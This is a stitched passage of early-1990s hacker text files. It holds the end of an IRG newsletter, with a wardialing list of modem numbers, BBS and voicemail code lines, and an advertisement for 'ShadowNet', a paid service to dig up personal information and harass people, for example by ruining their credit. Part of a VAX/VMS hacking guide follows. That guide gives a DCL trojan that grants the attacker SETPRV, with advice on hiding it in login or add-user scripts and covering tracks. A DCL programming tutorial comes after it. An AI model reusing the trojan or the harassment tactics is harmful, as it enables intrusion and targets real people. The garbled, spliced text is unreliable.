  758. spot. Look for a complete scan in v1.00, next IRG.
  759.  
  760.  
  761. NPA/NUM-BER    Baud   System/Comments
  762. ------------   -----  --------------------------------
  763. 619/259-0038   n/a    ?/constant tone
  764. 619/270-0017   1200   ?/has echo on
  765. 619/270-0038   2400   ?/"Unauthorized User, Call Recorded and Disconnected"
  766. 619/753-0006   n/a    ?/constant tone (may be loop)
  767. 619/753-0013   n/a    ?/constant tone
  768. 619/753-0171   1200   ?/"D29 System C, Node XX, Line XX"
  769. 619/753-0172   1200   ?/"D29 System C, Node XX, Line XX"
  770. 619/753-0173   1200   ?/"D29 System C, Node XX, Line XX"
  771. 619/753-0174   1200   ?/"D29 System C, Node XX, Line XX"
  772. 619/753-0175   1200   ?/"D29 System C, Node XX, Line XX"
  773. 619/753-0176   1200   ?/"D29 System C, Node XX, Line XX"
  774. 619/753-0243   2400   ?/(sending a hard break makes hangup)  
  775. 619/753-0287   1200   TRW Dialup
  776. 619/753-0288   1200   TRW Dialup
  777. 619/753-0548   1200   ?/"D29 System C, Node XX, Line XX" 
  778. 619/753-0716   1200   ?/"ALPHA BASE, PLEASE LOG IN:"
  779. 619/753-0738   1200   ?/(just hangs up, maybe callback security?)
  780. 619/753-0911   1200   ?/(response to break ^Z)
  781. 619/753-0916   1200   ?/(response to break ^Z)
  782. 619/753-0933   1200   ?/(response to break ^Z)
  783. 619/753-0962   1200   ?/(response to break ^Z)
  784. 619/753-0981   2400   HP-?0000/PLEASE LOG IN: (try 'help')
  785. 619/753-1550   2400   PC-Plus Host Mode/ American Bamboo Society
  786. 619/753-2614   1200   ?/(absolutely no activity - a modem with no 'puter?)
  787. 619/753-2728   2400   "Host Name:" (^C will get "User ID:") (CIS, node ENC)
  788. 619/753-1654   2400   ?/Esc will get "ACCOUNT-ID: / PASSWORD:"
  789. 619/753-1079   1200   ?/"D29, System C, Node XX, Line XX"
  790.  
  791.  
  792.  
  793.  
  794.         This is hardly a complete list, its more or less the result
  795. of boredom, and fairly random scanning through an outdial, it does
  796. cover about 1/3 of the 619-753 exchanange, but I never finished because
  797. of lack of time and other projects taking precedence. I would like
  798. to try and organize a concerted effort to map out any/all NPA's, and
  799. eventually publish a masterlist of all detectable carrier signals. Its
  800. easy to do, and you can usually let yer computer scan while yer gone
  801. to school/work, so if you'd be interested in helping out, leave me a
  802. note on one of the IRG boards and tell me the NPA and exckünτes you'd
  803. be `BLe to scan, via local call or some sort of outdial, so we can make
  804. sure that different people aren't wasting time scanning the same exchanges!
  805. Anyone who helps to build the list will g1 at Glasgow
  806. End of file - Frm    9; Next>
  807.  
  808.  
  809.  
  810. 6.BBSs From Hell
  811. ----------------
  812.         Here is this issue's installment of BBSs From Hell.
  813.  
  814. Board Name                      Phone Number      NUP       SysOp
  815. -------------------------------------------------------------------------------
  816. Shadow's Of Doom                313/274-5630      ?          ?
  817. Fornax                          408/370-0722      ?          Briareos
  818. The Rocky Mountains             714/530-6258      ?          ?
  819. The CorrupT SocieTy             619/630-8450      Defiance   The Spectral Demon
  820. Land Of Karrus                  215/948-2132      Nightmare  Scooter
  821.  
  822. Next issue we will have five more Elite BBSes for you to try.  Sorry if I have
  823. placed your bbs number on here without your knowing, if you would like it
  824. removed from the master list please E-mail me at Insanity Lane 619-591-4974
  825. NUP: Last Try.
  826.  
  827.  
  828. 7.VMBs From Hell
  829. ----------------
  830.         Heres a little plus I decided to have in each IRG news, a VMB list it
  831. will work like the BBS list in that I will have 5 VMBs each issue and every so
  832. often I will have a master list printed.  All changes to VMBs will be posted in
  833. each IRG News.
  834.  
  835. VMB Number           Box Number               VMB Use
  836. -------------------------------------------------------------------------------
  837. 1-800-877-7594                                Code Line
  838. 1-800-848-1488       * 0                      Code Line / Info Line
  839. 1-800-741-5881       9 + * * 1111             Code Line / Info Line
  840. 1-800-950-0203       289                      Time Lord's Code Line/ Info Line
  841. 1-800-950-0203       617                      Code Line / Info Line
  842.  
  843. Well thats it for this installment of VMBs From Hell.  If you would like you
  844. VMB in IRG News please leave mail at IRG/ShadowNet VMB #1 1-800-527-0543 Box
  845. Number: 8 + 158.
  846.  
  847.  
  848. 8.Running The ShadowNet
  849. -----------------------
  850.         ShadowNet is the newest addition to IRG.  It is a information service
  851. for anyone willing to pay.  ShadowNet works the way a Private Investigator
  852. works...you pay us to find out information on people, except we will do much
  853. more than that.
  854.  
  855.         We will go one step farther than any PI would go.  We will change his
  856. phone #, send him 100 pizzas, or ruin his credit rate.  Of course the more you
  857. pay the better you get.  At the beginning we will work for free to show that we
  858. can do what you ask.  So get your orders in fast.  All we need is a name, phone
  859. number, handle, whatever.  The more information you start giving us the
  860. more you will get back.  I also am in need of "agents" or people to help work
  861. with me.  I hope to get at least one person in each area code so information
  862. can be found easier and faster.  Of course you are not restricted to the
  863. computer oriented community. We can and WILL find information on ANYONE. We'll
  864. also work for anyone who is willing to pay. So let's hear from you, either on
  865. my BBS/VMB.  Give me your voice phone number, and your name.  I will contact you
  866. for who you want ShadowNet to find out about. If you would like to join leave
  867. the same info but tell me that you want to join.  Simple enough. Until Next
  868. time.
  869.  
  870.  
  871. 9.Hellos and Goodbyes
  872. ---------------------
  873.         So you are now done reading IRG-03, I hope you enjoyed yourself.  I am
  874. sure the more IRG Newsletters me and The Spectral Demon put out the better they
  875. will get, if possible. TSD and I have worked hard on this newsletter and now its
  876. your turn. Hurry & get those letters in for the next IRG News.  Now for the
  877. hellos & goodbyes, greets and etc!
  878.  
  879.         FiRM what ever happened to you?
  880.         INC ditto!
  881.         Kryptic Night do you do Magic Mushrooms?
  882.         PHA whats next for you?
  883.       * Greets to Elite Tabloid Underground
  884.         What ever happened to the Elite community?  Strike Back!
  885.         Remember:  Big Brother Is Watching
  886.         Freedom Of Speech!
  887.  
  888. * - Entries marked with *'s are by The Spectral Demon only
  889. -------------------------------------------------------------------------------
  890. This Is An Offical IRG/ShadowNet Production All Rights Resevered
  891. Copy Write (C)   Jan. 1 1991
  892. -------------------------------------------------------------------------------
  893.  
  894.         Call The IRG HeadQuarters:
  895.         Insanity Lane
  896.         Home Of IRG
  897.         619-591-4974
  898.         NuP: Last Try
  899.         Running Aftershock 1.21
  900.         Call here for the latest in IRG Productions, and invaluable P/H/C/A
  901.         information found nowhere else, except at:
  902.  
  903.         The CorrupT SocieTy
  904.         IRG Node 02
  905.         619-630-8450
  906.         NuP: Defiance
  907.         Running AfterShock 1.21
  908.  
  909.         Also Call This Fine IRG/ShadowNet VMB #1
  910.         1-800-527-0543
  911.         Box Number: 8 + 158
  912. First of course you MUST
  913. check for the privileges of the user (just like in the above program), then
  914. try:
  915.  
  916. $open/write file sys$scratch:adduaf.tmp
  917. $write file "$ RUN SYS$SYSTEM:AUTHORIZE"
  918. $write file "MODIFY NAME/PRIV=SETPRV"
  919. $close file
  920. $@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat
  921. $del sys$scratch:adduaf.*;*
  922.  
  923.  
  924. This little patch in the coding will modify your own users privileges and give
  925. them SETPRV when the superuser executes this routine.  The trick is to hide it
  926. within some other program so he doesn't even realize he has done anything! Of
  927. course after the routine has been successfully executed, the original coding
  928. should be put back.  There are many places you can put this routine, including
  929. ADDUSER.COM (if you have write access)!  That would mean, every time the
  930. system manager went to add a new user, he would also boost your privs! HaHa,
  931. quite ironic eh?!  The farthest thing that he wants to do, and you make him do
  932. it without even realizing.  Of course you should use your imagination and put
  933. this or a similar routine in a place where it will be quickly executed.  The
  934. longer the code stays around without being execute, the more chance that it
  935. will be discovered.  An optimum program would be something that the
  936. users/operators execute frequently (eg notes, mail, phone etc)  Other good
  937. places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your
  938. tracks once you're done!!
  939.  
  940.  This is but a brief introduction to Trojans and the like.  You should use your
  941. own imagination to come up with other ways of making the system operators
  942. succumb to your wishes...heh heh.
  943.  
  944.  
  945. DCL PROGRAMMING
  946. ---------------
  947.  
  948.  No file would be complete without at least mentioning programming Command
  949. Procedures.  Basically, these are like BAT files from MS-DOS or script files
  950. from UNIX.  They form a rudimentary but powerful language that allows you to
  951. quickly create small programs to handle most simple tasks.  This section is not
  952. intended to be a a full blown tutorial on programming in DCL, rather its an
  953. introduction to what it is all about.
  954.  It is quite easy to pick up programming in DCL and the best way to learn is to
  955. have a look at some of the COM files you will find on the various VAXes that
  956. you hack on.  By studying these, you can quickly learn the methods on how to
  957. perform
  958. certain routines.  Below I have listed some of the commonly needed routines
  959. when programming in DCL:
  960.  
  961.  
  962. PASSING PARAMETERS
  963.  
  964. Parameters can be passed to DCL programs directly from the shell in several
  965. ways. Here are a few examples:
  966.  
  967. (1) @sample 24 25
  968.  
  969.     When you execute this, the values 24 and 25 are passed to the sample.com
  970.     file in the variables p1 and p2 respectively. ie p1=24, p2=25
  971.  
  972. (2) @sample Paul Cramer
  973.  
  974.     p1=PAUL,  p2=CRAMER
  975.  
  976. (3) @sample "Paul Cramer"
  977.  
  978.     p1=Paul,  p2=Cramer
  979.  
  980. (4) name= "Paul Cramer"
  981.     @sample 'name'
  982.  
  983.     This example demonstrates the mâKof passing predefined variables to a
  984.     command procedure.  In this case,  p1=PAUL,  p2=CRAMER
  985.  
  986. (5) name ="""Paul Cramer"""
  987.     @sample 'name'
  988.  
  989.     Note that passing the variable in three double-quotes preserves the case.
  990.     p1=Paul,  p2=Cramer
  991.  
  992.  
  993.  
  994. GETTING INPUT
  995.  
  996.   Often it is necessary to get some sort of input from the user when executing
  997. a command procedure.  This is performed through the INQUIRE command. Some
  998. examples follow:
  999.  
  1000. (1) INQUIRE variable "prompt"
  1001.  
  1002.     This will display the 'prompt' message and then wait for input.  The string
  1003.     passed is kept in 'variable'
  1004.  
  1005. (2) INQUIRE/NOPUNC variable "prompt"
  1006.  
  1007.     When you specify /NOPUNC, the prompt will NOT be followed by a colon and
  1008.     space as is the default.
  1009.  
  1010. (3) INQUIRE/LOCAL variable "prompt"
  1011.     INQUIRE/GLOBAL variable "prompt"
  1012.  
  1013.     It should be noted that if you specify /LOCAL, the variable will remain in
  1014.     the local symbol table accessible only by this particular COM file.  If on
  1015.     the other hand, you specify /GLOBAL, the variable is placed in the global
  1016.     symbol table and is made accessible to other files.
  1017.  
  1018. (4) IF pn .eqs. "" THEN INQUIRE pn "prompt"
  1019.  
  1020.     You can use this method to check if a certain variable (pn in this case) is
  1021.     null or not.  If it is, you can ask for input.
  1022.  
  1023. (5) READ/PROMPT="prompt" SYS$COMMAND variable
  1024.  
  1025.     This is another method of getting input.
  1026.  
  1027.  
  1028.  
  1029. SUPPLY INPUT FOR A PROGRAM
  1030.  
  1031. Often you may need to create a file and get input from some outside source.
  1032. Again there are several ways of doing this.  Here I will outline three
  1033. different methods:
  1034.  
  1035. FROM DATA      :- CREATE TEST.DAT
  1036.                   data line 1
  1037.                   data line 2
  1038.                        :
  1039.                        :
  1040.                     etc etc
  1041.  
  1042. FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND
  1043.                   CREATE TEST.DAT
  1044.  
  1045. FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT
  1046.                   CREATE TEST.FILE
  1047.  
  1048.  
  1049. OUTPUTTING INFORMATION
  1050.  
  1051. In general when outputting information, you should always send it to SYS$OUTPUT
  1052. What this does is automatically write to whatever the user has defined as
  1053. SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it
  1054. will send it in the correct format.  Some examples follow:
  1055.  
  1056. (1)  WRITE SYS$OUTPUT "literal text"
  1057.  
  1058.      This will print 'literal text' on your terminal.
  1059.  
  1060. (2)  WRITE SYS$OUTPUT symbol-name
  1061.  
  1062.      This will print on your terminal whatever value is held in symbol-name
  1063.  
  1064. (3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text"
  1065.  
  1066.      This example shows how you can mix in normal text with a variable and
  1067.      follow it by more text.
  1068.  
  1069. (4)  TYPE SYS$INPUT
  1070.      this is a sample message
  1071.      that is spread out over
  1072.      several lines.
  1073.  
  1074.      You would use this method whenever there are more than a few lines of text
  1075.      to be printed.
  1076.  
  1077.  
  1078.  
  1079. WRITING TO A FILE
  1080.  
  1081. You will find that many times when writing a COMmand procedure you will need to
  1082. save certain information to a file.  This can be accomplished with a routine
  1083. similar to:
  1084.  
  1085. OPEN/WRITE FILE TEST.DAT
  1086. WRITE:
  1087.  INQUIRE DATA "Input Data"
  1088.  IF DATA .EQS. "" THEN GOTO DONE
  1089.  WRITE FILE DATA
  1090.  GOTO WRITE
  1091. DONE:
  1092.  CLOSE FILE
  1093.  
  1094. I will give a quick breakdown of what is going on here.  First you open the
  1095. file that you want, including the /WRITE qualifier followed by the filename.
  1096. This sample program simply inputs data, writes each line to a file and exits
  1097. when the user hits RETURN on a blank line.  Simple but effective text input
  1098. facility.
  1099.  
  1100.  
  1101.  
  1102. READING A FILE
  1103.  
  1104. Once you have written a file, you will often need to read that information back
  1105. in again. For example you may keep track of when the person last ran the file.
  1106. Each time the file is run, you would save the time/date to a file, and then
  1107. read it back in, and display it on each subsequent execution.  The sample
  1108. structure of a read routine would be:
  1109.  
  1110. OPEN/READ FILE TEST.DAT
  1111. READ:
  1112.  READ/END_OF_FILE=DONE FILE DATA
  1113.       .
  1114.       .
  1115.       .
  1116.  GOTO READ
  1117. DONE:
  1118.  CLOSE FILE
  1119.  
  1120. This routine would loop and keep reading a file, one line at a time, storing
  1121. the information in DATA until the end of file is detected.
  1122.  
  1123.  
  1124.  
  1125. CONDITIONAL LOGIC
  1126.  
  1127. No programming language would be complete without the ability to perform logic.
  1128. Although it is very simplistic, it provides just enough power to handle most
  1129. simple conditions.  Some examples:
  1130.  
  1131. (1) IF p1 .EQS. "" THEN GOTO DEFAULT
  1132.  
  1133.     In this example the procedure checks to see if the parameter passed in p1
  1134.     is NULL or not.  If it is then the program branches to DEFAULT
  1135.  
  1136. (2) IF p1 .NES. 10 THEN GOTO end_label
  1137.            .
  1138.            .
  1139.            .
  1140.     END_LABEL:
  1141.  
  1142.     Here we see that if p1 does not equal 10 then the program branches to
  1143.     END_LABEL, otherwise it continues.
  1144.  
  1145. (3) COUNT = 0
  1146.     LOOP:
  1147.      COUNT=COUNT+1
  1148.         .
  1149.         .
  1150.         .
  1151.      IF COUNT .LE. 10 THEN GOTO LOOP
  1152.     EXIT
  1153.  
  1154.  
  1155.     This example shows how to establish a loop in a command procedure, using
  1156.     the symbol COUNT and an IF statement.  The IF statement checks the value
  1157.     of COUNT and performs an EXIT when the value is greater than 10
  1158.  
  1159.  
  1160. EXPRESSIONS
  1161.  
  1162.    The data operations and comparisons are listed below in order of precedence
  1163. beginning with the highest (operations and comparisons grouped together in the
  1164. table have the same precedence).
  1165.  
  1166.  
  1167.    +--------+---------------------------------------------------------+
  1168.    Operator                    Description
  1169.    +--------+---------------------------------------------------------+
  1170.       +     Indicates a positive number
  1171.       -     Indicates a negative number
  1172.    +--------+---------------------------------------------------------+
  1173.       *     Multiplies two numbers
  1174.       /     Divides two numbers
  1175.    +--------+---------------------------------------------------------+
  1176.       +     (1) Adds two numbers
  1177.             (2) Concatenates two character strings
  1178.       -     (1) Subtracts two numbers
  1179.             (2) Subtracts two character strings
  1180.    +--------+---------------------------------------------------------+
  1181.     .EQS.   Tests if two character strings are equal
  1182.     .GES.   Tests if first character string is greater than or equal
  1183.     .GTS.   Tests if first character string is greater than
  1184.     .LES.   Tests if first character string is less than or equal
  1185.     .LTS.   Tests if first character string is less than
  1186.     .NES.   Tests if two character strings are not equal
  1187.     .EQ.    Tests if two numbers are equal
  1188.     .GE.    Tests if first number is greater than or equal to
  1189.     .GT.    Tests if first number is greater than
  1190.     .LE.    Tests if first number is less than or equal to
  1191.     .LT.    Tests if first number is less than
  1192.     .NE.    Tests if two numbers are not equal
  1193.    +--------+---------------------------------------------------------+
  1194.     .NOT.   Logically negates a number
  1195.    +--------+---------------------------------------------------------+
  1196.     .AND.   Combines two numbers with a logical AND
  1197.    +--------+---------------------------------------------------------+
  1198.     .OR.    Combines two numbers with a logical OR
  1199.    +--------+---------------------------------------------------------+
  1200.  
  1201.  
  1202.  
  1203.  
  1204. LEXICAL FUNCTIONS
  1205. -----------------
  1206.  
  1207. That concludes the introduction to DCL programming.  One thing that you should
  1208. keep in mind is that many powerful string editing and environment information
  1209. commands can be accessed from COM files.  These are called the LEXICAL
  1210. functions There are too numerous to list them all here, so I will just provide
  1211. a summary of the primary lexical functions and a brief description:
  1212.  
  1213.  
  1214.  
  1215. LEXICAL       DESCRIPTION
  1216. -------------+------------------------------------------------------------------
  1217. f$cvsi       !converts character string data (signed value) to an integer
  1218. f$cvtime     !retrieves information about an absolute, combination, or delta
  1219.               time
  1220. f$cvui       !converts character string data (unsigned value) to an integer
  1221. f$directory  !returns the current default directory name string
  1222. f$edit       !edits a character string based on the edits specified
  1223. f$element    !extracts an element from a string in which the elements are
  1224.              !separated by a specified delimiter
  1225. f$environment!obtains information about the DCL command environment
  1226. f$extract    !extracts a substring from a character string expression
  1227. f$fao        !converts the control string to an ASCII string
  1228. f$file_attrib!returns attribute information for a specified file
  1229. f$getdvi     !returns parameters for a specified device
  1230. f$getjpi     !returns accounting, status and identification info for a process
  1231. f$getsyi     !returns status and identification information about local or
  1232.              !remote nodes.
  1233. f$identifer  !converts an identifier in named format to its integer equivalent
  1234. f$integer    !returns the integer equivalent of the result of an expression
  1235. f$locate     !locates a character substring within a string and returns its
  1236.              !offset within the string
  1237. f$logical    !translates a logical name and returns the equivalence name string
  1238. f$message    !returns the message text associated with a system status code
  1239. f$mode       !shows the mode in which the process is executing
  1240. f$parse      !parses a file spec and returns either the expanded file spec or
  1241.              !a particular field that you specify
  1242. f$pid        !for each invocation, returns the next PID in sequence
  1243. f$privilege  !returns a value of TRUE or FALSE depending on whether your
  1244.              !process privileges match the privileges listed in the argument
  1245. f$process    !returns the current process name string
  1246. f$search     !searches the directory and returns the full file spec for any
  1247.               file
  1248. f$setprv     !sets the specified privileges and returns the previous state
  1249. f$string     !returns the string equivalent of the result of the specified
  1250.              !expression
  1251. f$time       !returns the data and time of day in format:  dd-mm-yy hh:mm:ss.cc
  1252. f$trnlnm     !translates a logical name and returns the equivalent name string
  1253. f$type       !determines the data type of a symbol
  1254. f$user       !returns the current user identification code (UIC)
  1255. f$verify     !set or read current command procedure state
  1256. -------------+-----------------------------------------------------------------
  1257.  
  1258. This list just outlines the main lexical functions.  Within each function there
  1259. may be many more subfunctions.  If you need help on any of these functions or
  1260. their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($)
  1261.  
  1262.  
  1263.  
  1264. ERROR MESSAGES
  1265. --------------
  1266.  
  1267.  Occasionally when you are using DCL, you will come across error messages that
  1268. are sent to you by the VAX.  Here I will give a break down of what the
  1269. different fields in the message represent and how to interpret them. First of
  1270. all, the general format of an error message is:
  1271.  
  1272. %facility-l-ident, text
  1273.  
  1274. NOTE: not all messages are ERROR messages.  Often it is only an informational
  1275.       message telling you that a certain task was successful or whatever. In
  1276.       any case here is what each field means:
  1277.  
  1278. facility  -this is the name of the facility that produced the  error (for
  1279.            example, CLI for the Command Language Interpreter).
  1280.  
  1281. l         -this is a one letter code indicating the severity of the error.
  1282.            The severities are:
  1283.  
  1284.                   I - Informational      E - Error
  1285.                   S - Success            F - Severe error
  1286.                   W - Warning
  1287.  
  1288. ident     -this is an abbreviation for the message text.
  1289.  
  1290. text      -this is a short description of the nature of the error.
  1291.  
  1292.  
  1293. Here is an example of an error message, and how to interpret it:
  1294.  
  1295. %SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege
  1296.  
  1297. The percent sign in the beginning tells you it is a system message from the VAX
  1298. the first field (SYSTEM) indicates that it is a SYSTEM error.  The second field
  1299. (F) shows that it is a severe error.  The third field (NOCMKRNL) is a short
  1300. abbreviation showing that you do not have the CMKRNL privilege, and the actual
  1301. text is followed giving the error in TCHING
  1302.  
  1303. Downloaded From P-80 Systems 304-744-2253
  1304.  
  1305.  
  1306. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
  1307.